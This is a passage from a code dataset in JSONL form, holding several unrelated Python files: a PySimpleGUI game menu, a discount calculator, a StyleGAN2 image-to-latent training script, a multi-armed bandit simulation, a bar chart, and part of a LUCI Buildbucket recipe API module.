\n\n","sub_path":"script/Guangqibentian.py","file_name":"Guangqibentian.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197077628","text":"import PySimpleGUI as sg\nfrom src.windows.Utilidades import buttons\n\ndef build():\n\n pad = ((20,0),(0,20))\n\n l_cont = [\n [sg.Text(\"MENU\", font=(\"Verdana\", 25), text_color=\"#f3f4ed\", background_color=\"#536162\",pad = ((0,0),(20,16)), size = (20,1), justification = \"c\" )],\n buttons(\"JUGAR\",17,\"-JUGAR-\",pad = pad),\n buttons(\"CONFIGURACIONES\",17,\"-CONFIGURACIONES-\",pad = pad),\n buttons(\"TABLA DE PUNTOS\",17,\"-TABLA_PUNTOS-\",pad = pad),\n buttons(\"ESTADISTICAS\",17,\"-ESTADISTICAS-\",pad = pad),\n buttons(\"REGLAS\",17,\"-REGLAS-\",pad = pad),\n buttons(\"AYUDA\",17,\"-AYUDA-\",pad = pad),\n buttons(\"SALIR\",17,\"-SALIR-\",pad = pad),\n ]\n\n layout = [\n [sg.Text(\"MemPy\", font=(\"Helvetica\", 45), text_color=\"#f3f4ed\",background_color=\"#424642\",pad = ((0,0),(0,20)) )],\n [sg.Column(l_cont, background_color=\"#536162\", element_justification=\"l\", pad=(0,0))]\n ]\n\n return sg.Window(\"MemPy\", layout,background_color=\"#424642\", element_justification=\"c\", margins = (20,20))\n\n\n\"\"\"window = build()\nwhile True:\n event, values = window.read()\n if event == \"OK\" or event == sg.WIN_CLOSED:\n break\nwindow.close()\"\"\"","sub_path":"ActividadGrupal1/src/windows/v_menu.py","file_name":"v_menu.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"578924454","text":"def MaximumDiscount(N, price):\n #print(price)\n\n a = discount_all(price)\n\n b = summ_discount(a)\n #print('summ discount for price= ', b)\n c = discount_without(price)\n t = summ_discount(c)\n #print('summ discount for /3= ',t)\n if b > t:\n return b\n elif t > b or t == b:\n return t\n\n\ndef discount_without(price): # сортирует price по убыванию и разбивает price на price_mod по 3 вещи\n\n price2 = sort_price(price)\n price2.reverse()\n\n i = 0\n count = 0\n min = price2[i]\n tmp_mass = []\n price_mod = []\n for i in range(len(price2)):\n d = (i+1)%3\n tmp_mass.append(price2[i])\n if d == 0:\n\n price_mod.append(tmp_mass)\n tmp_mass = []\n #print(price_mod)\n i=0\n j=0\n\n dis_with = []\n for i in range(len(price_mod)):\n min = price_mod[i][j]\n for j in range(len(price_mod[i])):\n if price_mod[i][j] < min:\n min = price_mod[i][j]\n dis_with.append(min)\n\n #print('min in price /3= ',dis_with)\n return dis_with\n\n\n\n\n\ndef summ_discount(min_price): #суммарная скидка\n i=0\n summ = 0\n for i in range(len(min_price)):\n summ = summ+min_price[i]\n return summ\n\ndef discount_all(price): # ксидка для изачального price\n\n\n free_element = len(price) // 3\n\n price1 = sort_price(price)\n\n min_price = []\n\n tmp = 0\n\n i=0\n for i in range(free_element):\n min_price.append(price1[i])\n #print('min in price', min_price)\n return min_price\n\ndef sort_price(price): # сортировка от мин к макс\n i = 0\n price1 = []\n for i in range(len(price)):\n price1.append(price[i])\n i = 0\n while True:\n count = 0\n for i in range(len(price1)):\n if i < (len(price1) - 1):\n if price1[i + 1] < price1[i]:\n tmp = price1[i]\n price1[i] = price1[i + 1]\n price1[i + 1] = tmp\n count += 1\n if count == 0:\n break\n return price1\n\n#N = 7\n#price = [100,150,200,250,300,350,400]\n#d = MaximumDiscount(N, price)\n#print('otvet',d)\n","sub_path":"discount.py","file_name":"discount.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"239847555","text":"import argparse\nfrom fastai.vision.all import get_image_files, imagenet_stats\nfrom pathlib import Path\nimport os\nimport re\n\nfrom torchvision import transforms\nimport torch\nimport torch.nn.functional as F\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom PIL import Image\n\nimport sys\nsys.path.append('/home')\n\n# our models for image to latent learning\nfrom Inversion.pytorch_stylegan_encoder.models.image_to_latent import ImageToLatent, ImageLatentDataset\nfrom asya_utils.model_tools.losses import LogCoshLoss\n\nimport wandb\n\n# for stylegan2 model\nfrom model import Generator\n\nimport setproctitle\nsetproctitle.setproctitle(\"[asya] - image2latent\")\n\ndef train(model, train_generator, validation_generator, optimizer, criterion, config, styleganmodel=None):\n if config.resume_checkpoint:\n print(\"resuming checkpoint\")\n step, min_validation_loss, model_state_dict = torch.load(config.checkpoint)\n model.load_state_dict(model_state_dict)\n else:\n step = 0\n min_validation_loss = float('inf')\n\n\n nb_images_to_show = 5\n validation_loss = 0.0\n one_time = 1\n\n progress_bar = tqdm(range(config.epochs))\n \n for epoch in progress_bar: \n running_loss = 0.0\n\n model.train()\n for i, (images_cpu, latents_cpu) in enumerate(train_generator, 1):\n optimizer.zero_grad()\n\n images, latents = images_cpu.cuda(), latents_cpu.cuda()\n \n #print(\"images :\", images)\n #print(\"imagse shape:\", images.shape)\n \n pred_latents = model(images)\n\n loss = criterion(pred_latents, latents)\n\n loss.backward()\n\n optimizer.step()\n\n running_loss += loss.item()\n\n train_metrics = {'(Train) Average Running Loss': running_loss / i, 'Train Loss': loss.item()}\n\n wandb.log(train_metrics, step=step)\n\n progress_bar.set_description(\"Step: {0}, Loss: {1:4f}, Validation Loss: {2:4f}\".format(i, running_loss / i, validation_loss))\n\n # visualize images if we gave stylegan model as input\n if (styleganmodel is not None) and (i - 1) % 100 == 0:\n \n # let's visualize random images \n randinds = np.random.randint(0, pred_latents.shape[0], nb_images_to_show)\n\n output, _ = styleganmodel([pred_latents[randinds]], input_is_latent=True)\n pred_image = output.detach().clamp_(min=-1, max=1).add(1).div_(2)#.mul(255)#.to('cpu').numpy()\n pred_image = F.interpolate(pred_image, size=256).to('cpu')\n\n wandb.log({\"train images\": [wandb.Image(images_cpu[randinds], caption=\"real image\"), wandb.Image(pred_image, caption=\"predicted projection\")]}, step=step)\n\n if i % 5000 == 0:\n # save model\n print(\"saving model\")\n torch.save([step, min_validation_loss, model.state_dict()], '/mnt/datadrive/asya/checkpoints/stylegan2/latent_encoder/temp_checkpoint.pt')\n\n step += 1\n\n validation_loss = 0.0\n\n model.eval()\n for i, (images_cpu, latents_cpu) in enumerate(validation_generator, 1):\n with torch.no_grad():\n images, latents = images_cpu.cuda(), latents_cpu.cuda()\n\n pred_latents = model(images)\n loss = criterion(pred_latents, latents)\n\n validation_loss += loss.item()\n\n validation_loss /= i\n\n if styleganmodel is not None:\n # get nb_images_to_show random indexes\n randinds = np.random.randint(0, pred_latents.shape[0], nb_images_to_show)\n\n output, _ = styleganmodel([pred_latents[randinds]], input_is_latent=True)\n pred_image = output.detach().clamp_(min=-1, max=1).add(1).div_(2)#.mul(255)#.to('cpu').numpy()\n pred_image = F.interpolate(pred_image, size=256).to('cpu')\n wandb.log({\"validation images\": [wandb.Image(images_cpu[randinds], caption=\"real image\"), wandb.Image(pred_image, caption=\"predicted projection\")]}, step=step)\n\n valid_metrics = {'(Validation) Average Running Loss': validation_loss}\n wandb.log(valid_metrics, step=step)\n progress_bar.set_description(\"Step: {0}, Loss: {1:4f}, Validation Loss: {2:4f}\".format(i, running_loss / i, validation_loss))\n\n # we save our model at the end of each epoch if the validation loss has been improved\n if validation_loss < min_validation_loss:\n print(\"New best model, saving.\")\n # let's save this model \n torch.save([step, min_validation_loss, model.state_dict()], config.checkpoint)\n \n\ndef verify_basename(basename):\n r = re.compile('latent_image_pairs_[0-9]{1,6}_[0-9]{1,4}_1[8]*')\n if r.match(basename) is not None:\n return True\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--basename', type=str, required=True, help='The basename image/latent pairs folder contained in parent folder')\n parser.add_argument('--parent', type=str, default='/home/datadrive/asya/datasets/StyleGAN2_ffhq_latent_image_pairs', help='This is the parent directory of all of our image/latent pairs. By default it is \"/home/datadrive/asya/datasets/StyleGAN2_latent_image_pairs\". The format of the subfolders containing the data here are all named latent_image_pairs_{nb_samples}_{image_size}_{latent_dimension}. This format must be respected.')\n \n parser.add_argument('--checkpoint_dir', type=str, default='/home/datadrive/asya/checkpoints/stylegan2/latent_encoder')\n parser.add_argument('--stylegan_ckpt', type=str, default='/home/datadrive/asya/checkpoints/stylegan2/stylegan2-ffhq-config-f.pt')\n parser.add_argument('--resume_training', default=False, action='store_true', help=\"if we want to to resume training (from checkpoint: checkpoint_dir/image_to_latent.pt)\")\n parser.add_argument('--batch_size', type=int, default=64)\n parser.add_argument('--val_ratio', type=float, default=0.1)\n parser.add_argument('--lr', type=float, default=0.0001)\n \n \n args = parser.parse_args()\n \n if not verify_basename(args.basename):\n raise ValueError(\"Please verify the basename argument (it must respect format 'latent_image_pairs___')\")\n \n _, _, _, nb_samples, im_size, latent_n = args.basename.split('_')\n nb_samples = int(nb_samples)\n im_size = int(im_size)\n latent_n = int(latent_n)\n \n #####################\n ### data loading: ###\n #####################\n \n data_dir = Path(args.parent) / args.basename\n if not os.path.exists(data_dir):\n raise ValueError(\"Basename directory does not exist. Please verify.\")\n \n filenames = sorted(get_image_files(data_dir))\n dlatents = np.load(str(data_dir/'w.npy')) # shape: (nb_samples, 512) or (nb_samples, latent_n, 512) if latent_n != 1\n \n # this will be used to save checkpoints as well as to save the wandb files\n checkpoint_dir = Path(args.checkpoint_dir)\n \n \n #######################################\n #### hyperparameters + dataloaders ####\n #######################################\n \n val_ratio = args.val_ratio\n cutoff = int(nb_samples * (1 - val_ratio))\n batch_size = args.batch_size\n learning_rate = args.lr\n\n image_resize = 224 # this is so that resnet works\n \n augments = transforms.Compose([\n transforms.Resize(image_resize),\n transforms.ToTensor(),\n transforms.Normalize(mean=imagenet_stats[0], std=imagenet_stats[1])\n ])\n \n train_filenames = filenames[:cutoff]\n val_filenames = filenames[cutoff:]\n \n train_latents = dlatents[:cutoff]\n val_latents = dlatents[cutoff:]\n \n train_dataset = ImageLatentDataset(train_filenames, train_latents, transforms=augments)\n val_dataset = ImageLatentDataset(val_filenames, val_latents, transforms=augments)\n \n train_gen = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size)\n val_gen = torch.utils.data.DataLoader(val_dataset, batch_size=batch_size)\n \n #####################\n ### define model ###\n #####################\n\n\n # Instantiate model\n\n image_to_latent = ImageToLatent(latent_n).cuda()\n optimizer = torch.optim.Adam(image_to_latent.parameters(), lr=learning_rate)\n criterion = LogCoshLoss() # this loss basically just compares the predicted latent to the true latent by doing an operation on their difference.\n\n # train model\n config = dict(\n epochs = 20,\n learning_rate = learning_rate,\n checkpoint = checkpoint_dir/'{}.pt'.format(args.basename),\n resume_checkpoint = args.resume_training\n )\n\n wandb.init(config=config, project=\"image_to_latent\", resume=args.resume_training, dir=str(checkpoint_dir))\n config = wandb.config\n wandb.watch(image_to_latent)\n\n # get the stylegan2 pretrained model \n args_dict = {}\n args_dict['device'] = 'cuda'\n args_dict['size'] = im_size\n args_dict['latent'] = 512\n args_dict['n_mlp'] = 8\n args_dict['n_latent'] = latent_n\n args_dict['channel_multiplier'] = 2\n args_dict['ckpt'] = args.stylegan_ckpt\n styleganmodel = Generator(\n args_dict['size'], args_dict['latent'], args_dict['n_mlp'], channel_multiplier=args_dict['channel_multiplier']\n ).to(args_dict['device'])\n checkpoint = torch.load(args_dict['ckpt'])\n styleganmodel.load_state_dict(checkpoint['g_ema'])\n\n train(image_to_latent, train_gen, val_gen, optimizer, criterion, config, styleganmodel)\n\n\n\n# ","sub_path":"Inversion/project/train_resnet.py","file_name":"train_resnet.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"418814663","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass BanditEnv:\n\n def __init__(self, actions):\n self.q_star = [np.random.randn() for i in range(actions)]\n self.best_action = np.argmax(self.q_star)\n\n def get_reward(self, action):\n return self.q_star[action] + np.random.randn()\n\n\nclass BasicAgent:\n\n def __init__(self, alpha, epsilon, actions):\n self.alpha = alpha\n self.epsilon = epsilon\n self.Q = [0 for i in range(actions)]\n\n def take_action(self):\n if np.random.rand() < self.epsilon:\n return np.random.choice(len(self.Q))\n\n return np.argmax(self.Q)\n\n def update(self, action, reward):\n self.Q[action] = self.Q[action] + self.alpha * (reward - self.Q[action])\n\n\nclass Config:\n\n def __init__(self, alpha, epsilon, times, steps):\n self.alpha = alpha\n self.epsilon = epsilon\n self.times = times\n self.steps = steps\n\n\ndef simulate(config):\n rewards = np.zeros((config.times, config.steps))\n best_action_count = np.zeros((config.times, config.steps))\n\n for t in range(config.times):\n agent = BasicAgent(alpha=0.1, epsilon=config.epsilon, actions=10)\n environment = BanditEnv(actions=10)\n\n for s in range(config.steps):\n action = agent.take_action()\n reward = environment.get_reward(action)\n agent.update(action, reward)\n\n rewards[t, s] = reward\n best_action_count[t, s] = 1 if action == environment.best_action else 0\n\n return best_action_count.mean(axis=0), rewards.mean(axis=0)\n\n\ndef figure_2_2():\n epsilons = [0, 0.01, 0.1]\n results = []\n\n for epsilon_val in epsilons:\n configuration = Config(alpha=0.1, epsilon=epsilon_val, times=500, steps=2000)\n mean_best_action_count, mean_reward = simulate(configuration)\n results.append((epsilon_val, mean_best_action_count, mean_reward))\n\n plt.figure(figsize=(10, 20))\n plt.subplot(2, 1, 1)\n for item in results:\n plt.plot(range(len(item[2])), item[2], label='epsilon = %.02f' % item[0])\n plt.legend()\n\n plt.subplot(2, 1, 2)\n for item in results:\n plt.plot(range(len(item[1])), item[1], label='epsilon = %.02f' % item[0])\n plt.legend()\n\n plt.show()\n\n\nif __name__ == '__main__':\n figure_2_2()\n","sub_path":"chapter02/my_ten_armed_testbed.py","file_name":"my_ten_armed_testbed.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"68442172","text":"import math\nimport random \nimport matplotlib.pyplot as plt\n\nx = list(range(1,50))\ny1 = [math.sin(i/5)*10 for i in x]\ny2 = [math.cos(i/5)*10 for i in x]\ny3 = [random.randrange(1, 100, 1) for i in x]\n\nplt.bar(x, y3, label='Ages Bar', color='#ffe600')\nplt.xlabel('Person No')\nplt.ylabel('Age')\nplt.title('Age Chart')\nplt.legend()\nplt.show()\n\n","sub_path":"Matplotlib/Simple_Bar_Chart.py","file_name":"Simple_Bar_Chart.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"602775933","text":"# Copyright 2017 The LUCI Authors. All rights reserved.\n# Use of this source code is governed under the Apache License, Version 2.0\n# that can be found in the LICENSE file.\n\n\"\"\"API for interacting with the buildbucket service.\n\nRequires `buildbucket` command in `$PATH`:\nhttps://godoc.org/go.chromium.org/luci/buildbucket/client/cmd/buildbucket\n\n`url_title_fn` parameter used in this module is a function that accepts a\n`build_pb2.Build` and returns a link title.\nIf it returns `None`, the link is not reported. Default link title is build id.\n\"\"\"\n\nimport json\n\nfrom google import protobuf\nfrom google.protobuf import field_mask_pb2\nfrom google.protobuf import json_format\n\nfrom recipe_engine import recipe_api\n\nfrom PB.go.chromium.org.luci.buildbucket.proto import build as build_pb2\nfrom PB.go.chromium.org.luci.buildbucket.proto import common as common_pb2\nfrom PB.go.chromium.org.luci.buildbucket.proto import rpc as rpc_pb2\nfrom . import util\n\n\nclass BuildbucketApi(recipe_api.RecipeApi):\n \"\"\"A module for interacting with buildbucket.\"\"\"\n\n HOST_PROD = 'cr-buildbucket.appspot.com'\n HOST_PROD_BEEFY = 'beefy-dot-cr-buildbucket.appspot.com'\n HOST_DEV = 'cr-buildbucket-dev.appspot.com'\n\n def __init__(\n self, property, legacy_property, mastername, buildername, buildnumber,\n revision, parent_got_revision, branch, patch_storage, patch_gerrit_url,\n patch_project, patch_issue, patch_set, issue, patchset, *args, **kwargs):\n super(BuildbucketApi, self).__init__(*args, **kwargs)\n self._service_account_key = None\n self._host = property.get('hostname') or self.HOST_PROD\n\n legacy_property = legacy_property or {}\n if isinstance(legacy_property, basestring):\n legacy_property = json.loads(legacy_property)\n self._legacy_property = legacy_property\n\n self._build = build_pb2.Build()\n if property.get('build'):\n json_format.Parse(\n json.dumps(property.get('build')),\n self._build,\n ignore_unknown_fields=True)\n self._bucket_v1 = 'luci.%s.%s' % (\n self._build.builder.project, self._build.builder.bucket)\n else:\n # Legacy mode.\n build_dict = legacy_property.get('build', {})\n self._bucket_v1 = build_dict.get('bucket', None)\n self.build.number = int(buildnumber or 0)\n self.build.created_by = build_dict.get('created_by', '')\n\n created_ts = build_dict.get('created_ts')\n if created_ts:\n self.build.create_time.FromDatetime(\n util.timestamp_to_datetime(float(created_ts)))\n\n if 'id' in build_dict:\n self._build.id = int(build_dict['id'])\n build_sets = list(util._parse_buildset_tags(build_dict.get('tags', [])))\n _legacy_builder_id(\n build_dict, mastername, buildername, self._build.builder)\n _legacy_input_gerrit_changes(\n self._build.input.gerrit_changes, build_sets, patch_storage,\n patch_gerrit_url, patch_project, patch_issue or issue,\n patch_set or patchset)\n _legacy_input_gitiles_commit(\n self._build.input.gitiles_commit, build_dict, build_sets,\n revision or parent_got_revision, branch)\n _legacy_tags(build_dict, self._build)\n\n self._next_test_build_id = 8922054662172514000\n\n @property\n def host(self):\n \"\"\"Hostname of buildbucket to use in API calls.\n\n Defaults to the hostname that the current build is originating from.\n \"\"\"\n return self._host\n\n @host.setter\n def host(self, value):\n self._host = value\n\n def set_buildbucket_host(self, host):\n \"\"\"DEPRECATED. Use host property.\"\"\"\n self.host = host\n\n def use_service_account_key(self, key_path):\n \"\"\"Tells this module to start using given service account key for auth.\n\n Otherwise the module is using the default account (when running on LUCI or\n locally), or no auth at all (when running on Buildbot).\n\n Exists mostly to support Buildbot environment. Recipe for LUCI environment\n should not use this.\n\n Args:\n * key_path (str): a path to JSON file with service account credentials.\n \"\"\"\n self._service_account_key = key_path\n\n @property\n def build(self):\n \"\"\"Returns current build as a `buildbucket.v2.Build` protobuf message.\n\n For value format, see `Build` message in\n [build.proto](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto).\n\n DO NOT MODIFY the returned value.\n Do not implement conditional logic on returned tags; they are for indexing.\n Use returned `build.input` instead.\n\n Pure Buildbot support: to simplify transition to buildbucket, returns a\n message even if the current build is not a buildbucket build. Provides as\n much information as possible. Some fields may be left empty, violating\n the rules described in the .proto files.\n If the current build is not a buildbucket build, returned `build.id` is 0.\n \"\"\"\n return self._build\n\n @property\n def builder_name(self):\n \"\"\"Returns builder name. Shortcut for `.build.builder.builder`.\"\"\"\n return self.build.builder.builder\n\n def build_url(self, host=None, build_id=None):\n \"\"\"Returns url to a build. Defaults to current build.\"\"\"\n return 'https://%s/build/%s' % (\n host or self._host, build_id or self._build.id)\n\n @property\n def gitiles_commit(self):\n \"\"\"Returns input gitiles commit. Shortcut for `.build.input.gitiles_commit`.\n\n For value format, see\n [`GitilesCommit` message](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto).\n\n Never returns None, but sub-fields may be empty.\n \"\"\"\n return self.build.input.gitiles_commit\n\n def is_critical(self, build=None):\n \"\"\"Returns True if the build is critical. Build defaults to the current one.\n \"\"\"\n build = build or self.build\n return build.critical in (common_pb2.UNSET, common_pb2.YES)\n\n @property\n def tags_for_child_build(self):\n \"\"\"A dict of tags (key -> value) derived from current (parent) build for a\n child build.\"\"\"\n original_tags = {t.key: t.value for t in self.build.tags}\n new_tags = {'user_agent': 'recipe'}\n\n # TODO(nodir): switch to ScheduleBuild API where we don't have to convert\n # build input back to tags.\n # This function returns a dict, so there can be only one buildset, although\n # we can have multiple sources.\n # Priority: CL buildset, commit buildset, custom buildset.\n commit = self.build.input.gitiles_commit\n if self.build.input.gerrit_changes:\n cl = self.build.input.gerrit_changes[0]\n new_tags['buildset'] = 'patch/gerrit/%s/%d/%d' % (\n cl.host, cl.change, cl.patchset)\n\n # Note: an input gitiles commit with ref without id is valid\n # but such commit cannot be used to construct a valid commit buildset.\n elif commit.host and commit.project and commit.id:\n new_tags['buildset'] = (\n 'commit/gitiles/%s/%s/+/%s' % (\n commit.host, commit.project, commit.id))\n if commit.ref:\n new_tags['gitiles_ref'] = commit.ref\n else:\n buildset = original_tags.get('buildset')\n if buildset:\n new_tags['buildset'] = buildset\n\n if self.build.number:\n new_tags['parent_buildnumber'] = str(self.build.number)\n if self.build.builder.builder:\n new_tags['parent_buildername'] = str(self.build.builder.builder)\n return new_tags\n\n def set_output_gitiles_commit(self, gitiles_commit):\n \"\"\"Sets `buildbucket.v2.Build.output.gitiles_commit` field.\n\n This will tell other systems, consuming the build, what version of the code\n was actually used in this build and what is the position of this build\n relative to other builds of the same builder.\n\n Args:\n * gitiles_commit(buildbucket.common_pb2.GitilesCommit): the commit that was\n actually checked out. Must have host, project and id.\n ID must match r'^[0-9a-f]{40}$' (git revision).\n If position is present, the build can be ordered along commits.\n Position requires ref.\n Ref, if not empty, must start with `refs/`.\n\n Can be called at most once per build.\n \"\"\"\n # Validate commit object.\n c = gitiles_commit\n assert isinstance(c, common_pb2.GitilesCommit), c\n\n assert c.host\n assert '/' not in c.host, c.host\n\n assert c.project\n assert not c.project.startswith('/'), c.project\n assert not c.project.startswith('a/'), c.project\n assert not c.project.endswith('/'), c.project\n\n assert c.ref.startswith('refs/'), c.ref\n assert not c.ref.endswith('/'), c.ref\n\n assert util.is_sha1_hex(c.id), c.id\n\n # position is uint32\n # Does not need extra validation.\n\n # The fact that it sets a property value is an implementation detail.\n res = self.m.step('set_output_gitiles_commit', cmd=None)\n prop_name = '$recipe_engine/buildbucket/output_gitiles_commit'\n res.presentation.properties[prop_name] = json_format.MessageToDict(\n gitiles_commit)\n\n def tags(self, **tags):\n \"\"\"Alias for tags in util.py. See doc there.\"\"\"\n return util.tags(**tags)\n\n @property\n def builder_cache_path(self):\n \"\"\"Path to the builder cache directory.\n\n Such directory can be used to cache builder-specific data.\n It remains on the bot from build to build.\n See \"Builder cache\" in\n https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/project_config.proto\n \"\"\"\n return self.m.path['cache'].join('builder')\n\n # RPCs.\n\n def _default_field_mask(self, path_prefix=''):\n \"\"\"Returns a default FieldMask message to use in requests.\"\"\"\n paths = [\n 'builder',\n 'create_time',\n 'created_by',\n 'critical',\n 'end_time',\n 'id',\n 'input',\n 'number',\n 'output',\n 'start_time',\n 'status',\n 'update_time',\n ]\n return field_mask_pb2.FieldMask(paths=[path_prefix + p for p in paths])\n\n def run(\n self, schedule_build_requests, collect_interval=None, timeout=None,\n url_title_fn=None, step_name=None, raise_if_unsuccessful=False):\n \"\"\"Runs builds and returns results.\n\n A shortcut for schedule() and collect_builds().\n See their docstrings.\n\n Returns:\n A list of completed\n [Builds](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto)\n in the same order as schedule_build_requests.\n \"\"\"\n with self.m.step.nest(step_name or 'buildbucket.run'):\n builds = self.schedule(\n schedule_build_requests, step_name='schedule',\n url_title_fn=url_title_fn)\n build_dict = self.collect_builds(\n [b.id for b in builds],\n interval=collect_interval,\n timeout=timeout,\n step_name='collect',\n raise_if_unsuccessful=raise_if_unsuccessful,\n # Do not print links. self.schedule printed them already.\n url_title_fn=lambda b: None,\n )\n return [build_dict[b.id] for b in builds]\n\n def schedule_request(\n self,\n builder,\n project=None,\n bucket=None,\n properties=None,\n experimental=None,\n gitiles_commit=None,\n gerrit_changes=None,\n tags=None,\n inherit_buildsets=True,\n dimensions=None,\n priority=None,\n critical=None,\n exe_cipd_version=None,\n ):\n \"\"\"Creates a new `ScheduleBuildRequest` message with reasonable defaults.\n\n This is a convenient function to create a `ScheduleBuildRequest` message.\n\n Among args, messages can be passed as dicts of the same structure.\n\n Example:\n\n request = api.buildbucket.schedule_request(\n builder='linux',\n tags=api.buildbucket.tags(a='b'),\n )\n build = api.buildbucket.schedule([request])[0]\n\n Args:\n * builder (str): name of the destination builder.\n * project (str): project containing the destinaiton builder.\n Defaults to the project of the current build.\n * bucket (str): bucket containing the destination builder.\n Defaults to the bucket of the current build.\n * properties (dict): input properties for the new build.\n * experimental: whether the build is allowed to affect prod.\n If not None, must be `common_pb2.Trinary` or bool.\n Defaults to the value of the current build.\n Read more about\n [`experimental` field](https://cs.chromium.org/chromium/infra/go/src/go.chromium.org/luci/buildbucket/proto/build.proto?q=\"bool experimental\").\n * gitiles_commit (common_pb2.GitilesCommit): input commit.\n Defaults to the input commit of the current build.\n Read more about\n [`gitiles_commit`](https://cs.chromium.org/chromium/infra/go/src/go.chromium.org/luci/buildbucket/proto/build.proto?q=Input.gitiles_commit).\n * gerrit_changes (list or common_pb2.GerritChange): list of input CLs.\n Defaults to gerrit changes of the current build.\n Read more about\n [`gerrit_changes`](https://cs.chromium.org/chromium/infra/go/src/go.chromium.org/luci/buildbucket/proto/build.proto?q=Input.gerrit_changes).\n * tags (list or common_pb2.StringPair): tags for the new build.\n * inherit_buildsets (bool): if `True` (default), the returned request will\n include buildset tags from the current build.\n * dimensions (list of common_pb2.RequestedDimension): override dimensions\n defined on the server.\n * priority (int): Swarming task priority.\n The lower the more important. Valid values are `[20..255]`.\n Defaults to the value of the current build.\n * critical: whether the build status should not be used to assess\n correctness of the commit/CL.\n Defaults to .build.critical.\n See also Build.critical in\n https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto\n * exe_cipd_version: CIPD version of the LUCI Executable (e.g. recipe) to use\n instead of the server-configured one.\n \"\"\"\n\n\n def as_msg(value, typ):\n assert isinstance(value, (dict, protobuf.message.Message)), type(value)\n if isinstance(value, dict):\n value = typ(**value)\n return value\n\n def copy_msg(src, dest):\n dest.CopyFrom(as_msg(src, type(dest)))\n\n def as_trinary(value):\n assert isinstance(value, (bool, int))\n if isinstance(value, bool):\n value = common_pb2.YES if value else common_pb2.NO\n return value\n\n b = self.build\n req = rpc_pb2.ScheduleBuildRequest(\n request_id='%d-%s' % (b.id, self.m.uuid.random()),\n builder=dict(\n project=project or b.builder.project,\n bucket=bucket or b.builder.bucket,\n builder=builder,\n ),\n priority=priority or b.infra.swarming.priority,\n experimental=b.input.experimental,\n critical=b.critical,\n fields=self._default_field_mask(),\n )\n if exe_cipd_version:\n req.exe.cipd_version = exe_cipd_version\n req.properties.update(properties or {})\n\n if experimental is not None:\n req.experimental = as_trinary(experimental)\n\n if critical is not None:\n req.critical = as_trinary(critical)\n\n # Populate commit.\n if not gitiles_commit and b.input.HasField('gitiles_commit'):\n gitiles_commit = b.input.gitiles_commit\n if gitiles_commit:\n copy_msg(gitiles_commit, req.gitiles_commit)\n\n # Populate CLs.\n if gerrit_changes is None:\n gerrit_changes = b.input.gerrit_changes\n for c in gerrit_changes:\n copy_msg(c, req.gerrit_changes.add())\n\n # Populate tags.\n tag_set = {('user_agent', 'recipe')}\n for t in tags or []:\n t = as_msg(t, common_pb2.StringPair)\n tag_set.add((t.key, t.value))\n\n if inherit_buildsets:\n for t in b.tags:\n if t.key == 'buildset':\n tag_set.add((t.key, t.value))\n\n # TODO(tandrii, nodir): find better way to communicate cq_experimental\n # status to Gerrit Buildbucket plugin.\n for t in b.tags:\n if t.key == 'cq_experimental':\n tag_set.add((t.key, t.value))\n\n for k, v in sorted(tag_set):\n req.tags.add(key=k, value=v)\n\n for d in dimensions or []:\n copy_msg(d, req.dimensions.add())\n\n return req\n\n def schedule(\n self, schedule_build_requests, url_title_fn=None, step_name=None):\n \"\"\"Schedules a batch of builds.\n\n Example:\n ```python\n req = api.buildbucket.schedule_request(builder='linux')\n api.buildbucket.schedule([req])\n ```\n\n Hint: when scheduling builds for CQ, let CQ know about them:\n ```python\n api.cq.record_triggered_builds(*api.buildbucket.schedule([req1, req2]))\n ```\n\n Args:\n * schedule_build_requests: a list of `buildbucket.v2.ScheduleBuildRequest`\n protobuf messages. Create one by calling `schedule_request` method.\n * url_title_fn: generates a build URL title. See module docstring.\n * step_name: name for this step.\n\n Returns:\n A list of\n [`Build`](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto)\n messages in the same order as requests.\n\n Raises:\n `InfraFailure` if any of the requests fail.\n \"\"\"\n assert isinstance(schedule_build_requests, list), schedule_build_requests\n for r in schedule_build_requests:\n assert isinstance(r, rpc_pb2.ScheduleBuildRequest), r\n if not schedule_build_requests:\n return []\n\n batch_req = rpc_pb2.BatchRequest(\n requests=[dict(schedule_build=r) for r in schedule_build_requests]\n )\n\n test_res = rpc_pb2.BatchResponse()\n for r in schedule_build_requests:\n test_res.responses.add(\n schedule_build=dict(\n id=self._next_test_build_id,\n builder=r.builder,\n )\n )\n self._next_test_build_id += 1\n\n step_res, batch_res, has_errors = self._batch_request(\n step_name or 'buildbucket.schedule', batch_req, test_res)\n\n # Append build links regardless of errors.\n for r in batch_res.responses:\n if not r.HasField('error'):\n self._report_build_maybe(\n step_res, r.schedule_build, url_title_fn=url_title_fn)\n\n if has_errors:\n raise self.m.step.InfraFailure('Build creation failed')\n\n # Return Build messages.\n return [r.schedule_build for r in batch_res.responses]\n\n def _report_build_maybe(self, step_result, build, url_title_fn=None):\n \"\"\"Reports a build in the step presentation.\n\n url_title_fn is a function that accepts a `build_pb2.Build` and returns a\n link title. If returns None, the link is not reported.\n Default link title is build id.\n \"\"\"\n build_title = url_title_fn(build) if url_title_fn else build.id\n if build_title is not None:\n pres = step_result.presentation\n pres.links[str(build_title)] = 